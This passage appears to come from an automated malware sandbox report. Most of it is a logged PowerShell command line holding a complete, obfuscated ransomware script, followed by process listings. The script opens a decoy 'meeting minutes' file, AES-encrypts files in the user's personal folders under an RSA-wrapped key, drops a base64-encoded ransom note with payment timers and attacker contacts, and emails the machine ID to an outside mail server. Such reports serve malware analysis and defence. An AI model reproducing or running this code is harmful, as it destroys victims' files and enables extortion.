GNsYXNzPSdhZGRyZXNzLWlucHV0JyBpZD0nVHhuS2V5JyB0eXBlPSd0ZXh0Jy8+PC9kaXY+PGJ1dHRvbiBjbGFzcz0nZ2VuZXJhdGUtYnRuJyBvbmNsaWNrPSdzYXZlTWFjaGluZUlEKCknPkdlbmVyYXRlIE1hY2hpbmUgSUQ8L2J1dHRvbj48L2Rpdj48cD48c3Ryb25nPlRoaXMgd2lsbCBnZW5lcmF0ZSBhIE1hY2hpbmUgSUQgZmlsZSB0aGF0IG5lZWRzIHRvIGJlIHNlbnQgYWxvbmcgdG8gdXMgaW4gb3JkZXIgdG8gZGVjcnlwdCBmaWxlcy48L3N0cm9uZz48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+NS4gSG93IHdpbGwgdGhlIGRlY3J5cHRpb24gcHJvY2VzcyBwcm9jZWVkIGFmdGVyIHBheW1lbnQ/PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbi1jb250ZW50Jz48cD5BZnRlciBwYXltZW50IHdlIHdpbGwgc2VuZCB0byB5b3Ugb3VyIHNjYW5uZXItZGVjb2RlciBwcm9ncmFtIGFuZCBkZXRhaWxlZCBpbnN0cnVjdGlvbnMgZm9yIHVzZS4gV2l0aCB0aGlzIHByb2dyYW0geW91IHdpbGwgYmUgYWJsZSB0byBkZWNyeXB0IGFsbCB5b3VyIGVuY3J5cHRlZCBmaWxlcy48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+Ni4gSG93IHRvIGNvbnRhY3Qgd2l0aCB5b3U/PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbi1jb250ZW50Jz48cD5Zb3UgY2FuIGNvbnRhY3QgdXMgdmlhIG1haWxib3ggb3IgVE9YLiBJZiB5b3UgZG9uJ3Qga25vdyBhYm91dCBUT1gsIGdvIHRvIDxhIGhyZWY9J2h0dHBzOi8vdG94LmNoYXQnPmh0dHBzOi8vdG94LmNoYXQuPC9hPjwvcD48cD48c3Ryb25nPkZpbmFsbHksIHRydXN0IHRoYXQgd2UgYXJlIGEgcmVwdXRhYmxlIGdyb3VwLiBXZSBwcm9taXNlIHRoYXQgeW91IGNhbiByZWNvdmVyIGFsbCB5b3VyIGZpbGVzIGFmdGVyIHRoZSBwYXltZW50Ljwvc3Ryb25nPjwvcD48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSdjb250YWN0LWFkZHJlc3MnPjxkaXYgY2xhc3M9J2NvbnRhY3QtbGFiZWwnPkVtYWlsIEFkZHJlc3M6PC9kaXY+PGRpdiBjbGFzcz0nYWRkcmVzcy1ib3gnPjxpbnB1dCBjbGFzcz0nYWRkcmVzcy1pbnB1dCcgcmVhZG9ubHk9JycgdHlwZT0ndGV4dCcgdmFsdWU9J2tpdDgyODBAcHVua3Byb29mLmNvbScvPjxidXR0b24gY2xhc3M9J2NvcHktYnRuJz5Db3B5PC9idXR0b24+PC9kaXY+PGRpdiBjbGFzcz0nY29udGFjdC1sYWJlbCc+VG94IElEOjwvZGl2PjxkaXYgY2xhc3M9J2FkZHJlc3MtYm94Jz48aW5wdXQgY2xhc3M9J2FkZHJlc3MtaW5wdXQnIHJlYWRvbmx5PScnIHR5cGU9J3RleHQnIHZhbHVlPSdENkRBQkREOTYwMEM5QzU0ODFFRDQxMjcwNzE1MDlEMjg3REQ1MzlGQjM2RjBCQzgyRDRGQTBGMDgwMEFGOTcwOTIzQjU1MDAwNjREJy8+PGJ1dHRvbiBjbGFzcz0nY29weS1idG4nPkNvcHk8L2J1dHRvbj48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSdmb290ZXInPsKpIDIwMjUgRmlsZSBEZWNyeXB0b3IgU2VydmljZS4gQWxsIHJpZ2h0cyByZXNlcnZlZC4gRGVjcnlwdGlvbiBrZXlzIGFyZSBzZWN1cmVseSBzdG9yZWQgb24gb3VyIHNlcnZlcnMuICAgICAgICA8L2Rpdj4=\";$j=\"ZnVuY3Rpb24gc3RhcnRDb3VudGRvd24oKXtjb25zdCBwYXltZW50VGltZXIgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgncGF5bWVudFRpbWVyJyk7Y29uc3QgZmlsZVRpbWVyID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2ZpbGVUaW1lcicpO2NvbnN0IHBheW1lbnREdWUgPSBuZXcgRGF0ZShlRGF0YSk7cGF5bWVudER1ZS5zZXREYXRlKHBheW1lbnREdWUuZ2V0RGF0ZSgpKyAyKTtjb25zdCBmaWxlTG9zdCA9IG5ldyBEYXRlKGVEYXRhKTtmaWxlTG9zdC5zZXREYXRlKGZpbGVMb3N0LmdldERhdGUoKSsgNSk7ZnVuY3Rpb24gdXBkYXRlVGltZXJzKCl7Y29uc3Qgbm93ID0gbmV3IERhdGUoKTtsZXQgcGF5bWVudERpZmYgPSBwYXltZW50RHVlIC0gbm93O2lmIChwYXltZW50RGlmZiA8PSAwKXtwYXltZW50VGltZXIudGV4dENvbnRlbnQgPSAnMDA6MDA6MDAnO31lbHNlIHtjb25zdCBwYXltZW50SG91cnMgPSBNYXRoLmZsb29yKHBheW1lbnREaWZmIC8gKDEwMDAgKiA2MCAqIDYwKSk7cGF5bWVudERpZmYgJT0gKDEwMDAgKiA2MCAqIDYwKTtjb25zdCBwYXltZW50TWludXRlcyA9IE1hdGguZmxvb3IocGF5bWVudERpZmYgLyAoMTAwMCAqIDYwKSk7cGF5bWVudERpZmYgJT0gKDEwMDAgKiA2MCk7Y29uc3QgcGF5bWVudFNlY29uZHMgPSBNYXRoLmZsb29yKHBheW1lbnREaWZmIC8gMTAwMCk7cGF5bWVudFRpbWVyLnRleHRDb250ZW50ID0gcGF5bWVudEhvdXJzLnRvU3RyaW5nKCkucGFkU3RhcnQoMiwnMCcpKyc6JytwYXltZW50TWludXRlcy50b1N0cmluZygpLnBhZFN0YXJ0KDIsJzAnKSsnOicrcGF5bWVudFNlY29uZHMudG9TdHJpbmcoKS5wYWRTdGFydCgyLCcwJyk7fWxldCBmaWxlRGlmZiA9IGZpbGVMb3N0IC0gbm93O2lmIChmaWxlRGlmZiA8PSAwKXtmaWxlVGltZXIudGV4dENvbnRlbnQgPSAnMDA6MDA6MDAnO31lbHNlIHtjb25zdCBmaWxlSG91cnMgPSBNYXRoLmZsb29yKGZpbGVEaWZmIC8gKDEwMDAgKiA2MCAqIDYwKSk7ZmlsZURpZmYgJT0gKDEwMDAgKiA2MCAqIDYwKTtjb25zdCBmaWxlTWludXRlcyA9IE1hdGguZmxvb3IoZmlsZURpZmYgLyAoMTAwMCAqIDYwKSk7ZmlsZURpZmYgJT0gKDEwMDAgKiA2MCk7Y29uc3QgZmlsZVNlY29uZHMgPSBNYXRoLmZsb29yKGZpbGVEaWZmIC8gMTAwMCk7ZmlsZVRpbWVyLnRleHRDb250ZW50ID0gZmlsZUhvdXJzLnRvU3RyaW5nKCkucGFkU3RhcnQoMiwnMCcpKyc6JytmaWxlTWludXRlcy50b1N0cmluZygpLnBhZFN0YXJ0KDIsJzAnKSsnOicrZmlsZVNlY29uZHMudG9TdHJpbmcoKS5wYWRTdGFydCgyLCcwJyk7fX11cGRhdGVUaW1lcnMoKTtzZXRJbnRlcnZhbCh1cGRhdGVUaW1lcnMsIDEwMDApO31mdW5jdGlvbiBzYXZlTWFjaGluZUlEKCl7Y29uc3QgVHhuSUQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnVHhuSUQnKS52YWx1ZS50cmltKCk7Y29uc3QgVHhuS2V5ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ1R4bktleScpLnZhbHVlLnRyaW0oKTtjb25zdCBNSUQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZGF0YScpLmRhdGFzZXQucGF5bG9hZDtpZiAoVHhuSUQubGVuZ3RoIT09NjQpe2FsZXJ0KCdJbnZhbGlkIFRyYW5zYWN0aW9uIElEJyk7cmV0dXJuO31pZiAoVHhuS2V5Lmxlbmd0aCE9PTY0KXthbGVydCgnSW52YWxpZCBUcmFuc2FjdGlvbiBLZXknKTtyZXR1cm47fWNvbnN0IGNvbWIgPSBUeG5JRCtUeG5LZXkrTUlEO2NvbnN0IGJsb2IgPSBuZXcgQmxvYihbY29tYl0sIHt0eXBlOid0ZXh0L3BsYWluO2NoYXJzZXQ9dXRmLTgnfSk7Y29uc3QgZmlsZU5hbWUgPSAnWW91cl9NYWNoaW5lX0lELnR4dCc7Y29uc3QgdXJsID0gVVJMLmNyZWF0ZU9iamVjdFVSTChibG9iKTtjb25zdCBhID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnYScpO2EuaHJlZiA9IHVybDthLmRvd25sb2FkID0gZmlsZU5hbWU7YS5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7YS5jbGljaygpO31kb2N1bWVudC5xdWVyeVNlbGVjdG9yQWxsKCcuY29weS1idG4nKS5mb3JFYWNoKGJ1dHRvbiA9PntidXR0b24uYWRkRXZlbnRMaXN0ZW5lcignY2xpY2snLCBhc3luYyBmdW5jdGlvbigpe2NvbnN0IGlucHV0ID0gdGhpcy5wYXJlbnROb2RlLnF1ZXJ5U2VsZWN0b3IoJy5hZGRyZXNzLWlucHV0Jyk7dHJ5IHthd2FpdCBuYXZpZ2F0b3IuY2xpcGJvYXJkLndyaXRlVGV4dChpbnB1dC52YWx1ZSk7Y29uc3Qgb3JpZ2luYWxUZXh0ID0gdGhpcy50ZXh0Q29udGVudDt0aGlzLnRleHRDb250ZW50ID0gJ0NvcGllZCEnO3NldFRpbWVvdXQoKCk9Pnt0aGlzLnRleHRDb250ZW50ID0gb3JpZ2luYWxUZXh0O30sIDIwMDApO31jYXRjaCAoZXJyKXtjb25zb2xlLmVycm9yKCdDb3B5IGZhaWw6JywgZXJyKTt9fSk7fSk7d2luZG93Lm9ubG9hZCA9IHN0YXJ0Q291bnRkb3duOzwvc2NyaXB0PjwvYm9keT48L2h0bWw+\";$b=[System.Convert]::FromBase64String($i);$c=[System.Convert]::FromBase64String($j);$t=[System.Text.Encoding]::UTF8.GetString($b);$u=[System.Text.Encoding]::UTF8.GetString($c);$w=\"<div data-payload='\"+[System.Convert]::ToBase64String($VhBppDOc99)+\"' id='data'></div></div><script>const eData = new Date(\"+[System.BitConverter]::ToInt64($CYwQwYHI99,0).ToString()+\"*1000);\";$v=$t+$w+$u;Set-Content -Path $h -Value $v -Encoding UTF8 -Force;}}seNd-mAiLMeSsAGe -sMtPseRver \"in.mail.tm\" -pORt 25 -From \"test@test.com\" -To \"244zita@mechanicspedia.com\" -suBjEct \"MachineID\" -boDy $w"
IconFileName:	C:\WINDOWS\System32\imageres.dll

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

149

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

6488

"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Downloads\Project_Workshop_7th_Minutes.txt

C:\Windows\System32\notepad.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Notepad

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll

8304

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

8532

C:\WINDOWS\System32\slui.exe -Embedding

C:\Windows\System32\slui.exe

—

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Activation Client

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

8820

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c "$f='C:\Users\'+$env:USERNAME+'\Downloads\Project_Workshop_7th_Minutes.txt';$c=\"MEETING MINUTES`r`nProject/Committee: Quarterly Research Progress Review`r`nTime: 10:00 AM - 11:30 AM`r`nLocation: Conference Room 301, Innovation Center`r`nChairperson: Dr. Alexandra Chen`r`nSecretary: Janna Riley`r`n`r`nATTENDEES`r`nChair, RDC Department: Dr. Alexandra Chen`r`nExternal Advisor: Prof. Benjamin Lee`r`nLead Researcher: Dr. Sophia Martinez`r`nData Analyst: Mr. James Wilson`r`nProject Coordinator: Ms. Emily Zhao`r`nAbsent with Notice: Dr. Robert Kim`r`n`r`nAGENDA ITEMS`r`n1. Review of Q2 Research Milestones`r`nDiscussion: Dr. Martinez presented progress on Phase 3 clinical trials, highlighting 85% participant enrollment completion. Prof. Lee raised concerns about data variance in Group B. Decision: Approval to allocate additional 15,000 budget for statistical consultation.`r`nAction Items:`r`n(1) Dr. Martinez to submit revised analysis report.`r`n(2) Mr. Wilson to audit Group B data anomalies.`r`n`r`n2. Publication Strategy for Findings`r`nDiscussion: Debate on prioritizing high-impact journals vs. open-access platforms. Ms. Zhao noted funding mandates requiring open-access compliance.`r`nDecision: Dual-track submission to The Lancet and institutional repository.`r`nAction Items:`r`n(1) Prof. Lee to contact Lancet editorial board.`r`n(2) Ms. Zhao to prepare preprint deposit.`r`n`r`n3. Ethics Compliance Update`r`nDiscussion: IRB flagged consent form discrepancies in Site 5 documentation.`r`nDecision: Immediate suspension of Site 5 recruitment pending audit.`r`nAction Items:`r`n(1) Dr. Chen to lead compliance review team.\";Set-Content -Path $f -Value $c -Encoding UTF8 -Force;Invoke-Item $f;$vRTfFXbX99=$eNV:USERNAME;$slFWoOrP99='C:\Users\'+$vRTfFXbX99;$AkGaihQv99=@('\Desktop','\Documents','\OneDrive','\Pictures','\Videos','\Music','\Downloads');$kEY=New-Object byte[] 16;$zyBYjPSi99=[SYsteM.SeCUrIty.CryptoGrApHy.rngCRyptoSErvicEPRovIDEr]::new();$zyBYjPSi99.GetBytes($kEY);$Key_m=[byte[]]@(0xdd,0x39,0x18,0xff,0x64,0xd4,0xfb,0xc6,0xc7,0x6e,0x89,0x82,0xff,0xca,0x9e,0xe5,0x0f,0x7b,0x30,0x8a,0xe0,0xc1,0x53,0x11,0x84,0x5a,0xac,0x09,0xca,0xf0,0xc9,0xea,0x15,0x37,0x98,0x88,0x92,0x4e,0xb4,0xce,0x12,0x51,0x7d,0xb7,0xc2,0xf3,0x54,0x96,0xd4,0x12,0x66,0xbd,0x35,0x19,0xd9,0x14,0x71,0xe6,0x3d,0x68,0x1e,0x44,0x7f,0xc9,0x85,0xf8,0x38,0x76,0x9a,0x12,0xad,0x4f,0xc6,0x0b,0x25,0x70,0x24,0x0e,0x4b,0x39,0xe8,0x59,0x25,0xe7,0x96,0x2b,0x60,0xe2,0x1c,0x58,0xbf,0x9b,0xbf,0x93,0x83,0xef,0x65,0xdd,0x02,0xa4,0xa8,0x3d,0x9d,0xd3,0x85,0xb6,0xb7,0x5a,0xe5,0x12,0x4c,0xe4,0x92,0xd2,0x0b,0x02,0xd0,0x5e,0x78,0x7d,0xb4,0x6c,0xb0,0xa9,0xda,0x2a,0xe2,0x1a,0x65,0x12,0xed,0x98,0x88,0x51,0xac,0x81,0x0c,0x5d,0x0d,0xd2,0xc7,0x17,0x7a,0x50,0x1f,0xbe,0xbe,0x64,0x33,0xb5,0x43,0x66,0x95,0xeb,0xe7,0x0e,0xd8,0x6c,0xb8,0x4e,0xac,0xf6,0x1c,0x23,0x50,0x37,0x6f,0xb3,0x77,0xeb,0xf4,0x9f,0x8c,0xf1,0x40,0x24,0x98,0x92,0xc4,0xf0,0x96,0x0f,0x43,0x65,0xaf,0xfb,0x94,0xc4,0x1f,0x14,0x08,0x56,0x8b,0xfe,0x6d,0x9a,0x5a,0x08,0xd8,0xe0,0x74,0x49,0x87,0x9e,0x4b,0x9a,0x92,0xad,0xa7,0xee,0x33,0x20,0x7c,0x75,0x2b,0x8b,0x37,0xd3,0x6c,0x6c,0x7a,0xd2,0x44,0x24,0x53,0xa7,0xc4,0xf2,0x3c,0xc5,0x79,0xcd,0x9c,0x70,0x04,0x02,0xf8,0x1f,0x44,0x99,0x96,0xe0,0x29,0xaa,0xa3,0x65,0xe9,0xe0,0x46,0x21,0x34,0xde,0x33,0xf5,0x73,0xeb);$kEY_E=[byte[]]@(0x01,0x00,0x01);$wVWNiGgX99=New-Object sysTEm.SEcUrIty.CRyPTOgrapHY.rSaParameters;$wVWNiGgX99.Modulus=$Key_m;$wVWNiGgX99.Exponent=$kEY_E;$rsa=[sysTEm.SEcUrIty.CRyPTOgrapHY.rSa]::Create();$rsa.ImportParameters($wVWNiGgX99);$VhBppDOc99=$rsa.Encrypt($kEY,[SYstem.secuRiTy.cRYPtOgRaPhY.rsAENCRyptioNPadDIng]::Pkcs1);$CYwQwYHI99=[sYsTem.BItconveRtEr]::GetBytes([SySTEm.dAtETiMEOfFseT]::UtcNow.ToUnixTimeSeconds());$PyCaWbSp99=@('.exe','.lnk','.dll','.bin','.bat','.cmd','.sys','.inf','.vxd','.ini','.cfg','.reg','.hiv','.ENCRYPT');foreach($CiWVvyXw99 in $AkGaihQv99) {$jGlkzoDW99=$slFWoOrP99+$CiWVvyXw99;if (Test-Path -LiteralPath $jGlkzoDW99) {$zaZUmabr99=Get-ChildItem -Path $jGlkzoDW99 -File -Recurse;foreach ($YWZsVfTx99 in $zaZUmabr99) {$HVEvLQGG99=$YWZsVfTx99.Extension.ToLower();if ($PyCaWbSp99 -contains $HVEvLQGG99){continue}try{$KDJdjrbK99=[syStEM.iO.File]::ReadAllBytes($YWZsVfTx99.FullName);$FcOlqhnq99=[SysTEM.seCurity.cRYPtOgraphy.AeS]::Create();$FcOlqhnq99.Key=$kEY;$FcOlqhnq99.GenerateIV();$FcOlqhnq99.Mode=[SySteM.SecuRiTY.CRypTogRapHY.ciPhErMOdE]::CBC;$FcOlqhnq99.Padding=[SYstEM.secuRITY.CrYPTOgrapHy.PaDDiNgMODe]::PKCS7;$xvrxmTkJ99=$FcOlqhnq99.CreateEncryptor();$oDCsHWcT99=$xvrxmTkJ99.TransformFinalBlock($KDJdjrbK99, 0, $KDJdjrbK99.Length);[syStEM.iO.File]::WriteAllBytes($YWZsVfTx99.FullName, $CYwQwYHI99+$VhBppDOc99+$FcOlqhnq99.IV+$oDCsHWcT99);$dWCcDFLY99=$YWZsVfTx99.Name+'.ENCRYPT';Rename-Item -Path $YWZsVfTx99.FullName -NewName $dWCcDFLY99 -Force;}finally {if ($FcOlqhnq99) { $FcOlqhnq99.Dispose();}}}$h=$jGlkzoDW99+'\DECRYPT_INSTRUCTION.html';$i=\"PCFET0NUWVBFIGh0bWw+PGh0bWwgbGFuZz0nZW4nPjxoZWFkPjxtZXRhIGNoYXJzZXQ9J3V0Zi04Jy8+PG1ldGEgY29udGVudD0nd2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCcgbmFtZT0ndmlld3BvcnQnLz48dGl0bGU+REVDUllQVCBJTlNUUlVDVElPTjwvdGl0bGU+PHN0eWxlPioge2JveC1zaXppbmc6Ym9yZGVyLWJveDt9Ym9keSB7bWluLWhlaWdodDoxMDB2aDtwYWRkaW5nOjIwcHg7fS5jb250YWluZXIge21heC13aWR0aDo5MDBweDttYXJnaW46MjBweCBhdXRvO2JhY2tncm91bmQtY29sb3I6I2ZmZjtib3JkZXItcmFkaXVzOjhweDtvdmVyZmxvdzpoaWRkZW47Ym94LXNoYWRvdzowIDVweCAxNXB4IHJnYmEoMCwgMCwgMCwgMC4xKTtib3JkZXI6MXB4IHNvbGlkICNlMGUwZTA7fS5oZWFkZXIge2JhY2tncm91bmQtY29sb3I6cmdiKDE0NCwgMCwgMzMpO3RleHQtYWxpZ246Y2VudGVyO2NvbG9yOndoaXRlO2Rpc3BsYXk6ZmxleDthbGlnbi1pdGVtczpjZW50ZXI7anVzdGlmeS1jb250ZW50OmNlbnRlcjtnYXA6MTVweDtib3JkZXItYm90dG9tOjJweCBzb2xpZCByZ2IoMTAwLCAwLCAyMyk7fS5sb2NrLWljb24ge2ZvbnQtc2l6ZToyNHB4O2JhY2tncm91bmQtY29sb3I6I2ZmZjtjb2xvcjpyZ2IoMTQ0LCAwLCAzMyk7d2lkdGg6NDBweDtoZWlnaHQ6NDBweDtib3JkZXItcmFkaXVzOjUwJTtkaXNwbGF5OmZsZXg7YWxpZ24taXRlbXM6Y2VudGVyO2p1c3RpZnktY29udGVudDpjZW50ZXI7fS5oZWFkZXIgaDEge2ZvbnQtc2l6ZToyNHB4O2xldHRlci1zcGFjaW5nOjAuNXB4O30uY291bnRkb3duLWNvbnRhaW5lciB7ZGlzcGxheTpmbGV4O2p1c3RpZnktY29udGVudDpzcGFjZS1hcm91bmQ7cGFkZGluZzoyMHB4O2JhY2tncm91bmQtY29sb3I6cmdiKDE0NCwgMCwgMzMpO2NvbG9yOndoaXRlO2JvcmRlci1ib3R0b206MXB4IHNvbGlkIHJnYigxMDAsIDAsIDIzKTt9LmNvdW50ZG93bi1ib3gge2JhY2tncm91bmQtY29sb3I6cmdiYSgwLCAwLCAwLCAwLjIpO2JvcmRlci1yYWRpdXM6NnB4O3BhZGRpbmc6MTVweCAyMHB4O3RleHQtYWxpZ246Y2VudGVyO3dpZHRoOjQwMHB4O30uY291bnRkb3duLXRpdGxlIHtmb250LXNpemU6MTZweDtmb250LXdlaWdodDpib2xkO21hcmdpbi1ib3R0b206MTBweDtjb2xvcjp3aGl0ZTt9LnRpbWVyIHtmb250LXNpemU6MjBweDtmb250LXdlaWdodDpib2xkO2xldHRlci1zcGFjaW5nOjFweDtiYWNrZ3JvdW5kLWNvbG9yOiMwMDA7Y29sb3I6I2ZmMzMzMztwYWRkaW5nOjhweDtib3JkZXItcmFkaXVzOjRweDt0ZXh0LWFsaWduOmNlbnRlcjt9Lndhcm5pbmcge2ZvbnQtc2l6ZToxM3B4O2ZvbnQtc3R5bGU6aXRhbGljO2NvbG9yOndoaXRlO3RleHQtYWxpZ246Y2VudGVyO21hcmdpbi10b3A6OHB4O30uY29udGVudCB7cGFkZGluZzozMHB4O30uc2VjdGlvbiB7bWFyZ2luLWJvdHRvbTozMHB4O30uc2VjdGlvbi10aXRsZSB7Zm9udC1zaXplOjIwcHg7bWFyZ2luLWJvdHRvbToxNXB4O2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6cmdiKDE0NCwgMCwgMzMpO30uc2VjdGlvbi1jb250ZW50IHtsaW5lLWhlaWdodDoxLjY7bWFyZ2luLWJvdHRvbToxNXB4O30ubW9uZXJvLWFkZHJlc3Mge21hcmdpbi10b3A6MjBweDtiYWNrZ3JvdW5kLWNvbG9yOiNmOWY5Zjk7cGFkZGluZzoyMHB4O2JvcmRlci1yYWRpdXM6NnB4O2JvcmRlci1sZWZ0OjRweCBzb2xpZCByZ2IoMTQ0LCAwLCAzMyk7fS5hZGRyZXNzLWxhYmVsIHtmb250LXNpemU6MTZweDtmb250LXdlaWdodDpib2xkO2NvbG9yOnJnYigxNDQsIDAsIDMzKTttYXJnaW4tYm90dG9tOjEwcHg7fS5hZGRyZXNzLWJveCB7ZGlzcGxheTpmbGV4O2JhY2tncm91bmQ6I2YwZjBmMDtib3JkZXI6MXB4IHNvbGlkICNkZGQ7Ym9yZGVyLXJhZGl1czo0cHg7b3ZlcmZsb3c6aGlkZGVuO21hcmdpbi10b3A6MTBweDt9LmFkZHJlc3MtaW5wdXQge2ZsZXg6MTtwYWRkaW5nOjEycHggMTVweDtmb250LXNpemU6MTRweDtib3JkZXI6bm9uZTtiYWNrZ3JvdW5kOiNmNWY1ZjU7Y29sb3I6IzMzMzt9LmdlbmVyYXRlLWJ0biB7YmFja2dyb3VuZC1jb2xvcjpyZ2IoMTQ0LCAwLCAzMyk7Y29sb3I6d2hpdGU7Ym9yZGVyOm5vbmU7bWFyZ2luLXRvcDoxMnB4O3BhZGRpbmc6MTJweCAxNXB4O2JvcmRlci1yYWRpdXM6NHB4O2N1cnNvcjpwb2ludGVyO2ZvbnQtc2l6ZToxNHB4O30uY29weS1idG4ge2JhY2tncm91bmQtY29sb3I6IzZjNzU3ZDtjb2xvcjp3aGl0ZTtib3JkZXI6bm9uZTtwYWRkaW5nOjAgMTVweDtjdXJzb3I6cG9pbnRlcjtmb250LXNpemU6MTRweDt0cmFuc2l0aW9uOmJhY2tncm91bmQtY29sb3IgMC4zczt9LmNvcHktYnRuOmhvdmVyIHtiYWNrZ3JvdW5kLWNvbG9yOiM1YTYyNjg7fS5mb290ZXIge2JhY2tncm91bmQtY29sb3I6cmdiKDE0NCwgMCwgMzMpO3BhZGRpbmc6MTVweDt0ZXh0LWFsaWduOmNlbnRlcjtmb250LXNpemU6MTJweDtjb2xvcjp3aGl0ZTtib3JkZXItdG9wOjFweCBzb2xpZCByZ2IoMTAwLCAwLCAyMyk7fS5jb250YWN0LWFkZHJlc3Mge2JhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTtwYWRkaW5nOjIwcHg7Ym9yZGVyLXJhZGl1czo2cHg7Ym9yZGVyLWxlZnQ6NHB4IHNvbGlkIHJnYigxNDQsIDAsIDMzKTttYXJnaW4tdG9wOjIwcHg7fS5jb250YWN0LWxhYmVsIHtmb250LXdlaWdodDpib2xkO21hcmdpbi1ib3R0b206OHB4O2NvbG9yOnJnYigxNDQsIDAsIDMzKTt9PC9zdHlsZT48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0nY29udGFpbmVyJz48ZGl2IGNsYXNzPSdoZWFkZXInPjxkaXYgY2xhc3M9J2xvY2staWNvbic+8J+UkjwvZGl2PjxoMT5ERUNSWVBUIElOU1RSVUNUSU9OPC9oMT48L2Rpdj48ZGl2IGNsYXNzPSdjb3VudGRvd24tY29udGFpbmVyJz48ZGl2IGNsYXNzPSdjb3VudGRvd24tYm94Jz48ZGl2IGNsYXNzPSdjb3VudGRvd24tdGl0bGUnPlBBWU1FTlQgRFVFIElOPC9kaXY+PGRpdiBjbGFzcz0ndGltZXInIGlkPSdwYXltZW50VGltZXInPjQ4OjAwOjAwPC9kaXY+PGRpdiBjbGFzcz0nd2FybmluZyc+QWZ0ZXIgdGhpcyB0aW1lLCB0aGUgcHJpY2Ugd2lsbCBkb3VibGU8L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSdjb3VudGRvd24tYm94Jz48ZGl2IGNsYXNzPSdjb3VudGRvd24tdGl0bGUnPkZJTEVTIExPU1QgSU48L2Rpdj48ZGl2IGNsYXNzPSd0aW1lcicgaWQ9J2ZpbGVUaW1lcic+MTIwOjAwOjAwPC9kaXY+PGRpdiBjbGFzcz0nd2FybmluZyc+QWZ0ZXIgdGhpcyB0aW1lLCBkZWNyeXB0aW9uIHdpbGwgYmUgaW1wb3NzaWJsZTwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J2NvbnRlbnQnPjxkaXYgY2xhc3M9J3NlY3Rpb24nPjxkaXYgY2xhc3M9J3NlY3Rpb24tdGl0bGUnPjEuIFdoYXQgSGFwcGVuZWQ/PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbi1jb250ZW50Jz48cD5Zb3VyIGltcG9ydGFudCBmaWxlcyBhcmUgZW5jcnlwdGVkLjwvcD48cD5NYW55IG9mIHlvdXIgZG9jdW1lbnRzLCBwaG90b3MsIHZpZGVvcywgZGF0YWJhc2VzIGFuZCBvdGhlciBmaWxlcyBhcmUgbm8gbG9uZ2VyIGFjY2Vzc2libGUgYmVjYXVzZSB0aGV5IGhhdmUgYmVlbiBlbmNyeXB0ZWQuIE1heWJlIHlvdSBhcmUgYnVzeSBsb29raW5nIGZvciBhIHdheSB0byByZWNvdmVyIHlvdXIgZmlsZXMsIGJ1dCBkbyBub3Qgd2FzdGUgeW91ciB0aW1lLiA8c3Ryb25nPk5vYm9keSBjYW4gcmVjb3ZlciB5b3VyIGZpbGVzIHdpdGhvdXQgb3VyIGRlY3J5cHRpb24gc2VydmljZS48L3N0cm9uZz48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+Mi4gQ2FuIEkgUmVjb3ZlciBNeSBGaWxlcz88L2Rpdj48ZGl2IGNsYXNzPSdzZWN0aW9uLWNvbnRlbnQnPjxwPlN1cmUuIFdlIGd1YXJhbnRlZSB0aGF0IHlvdSBjY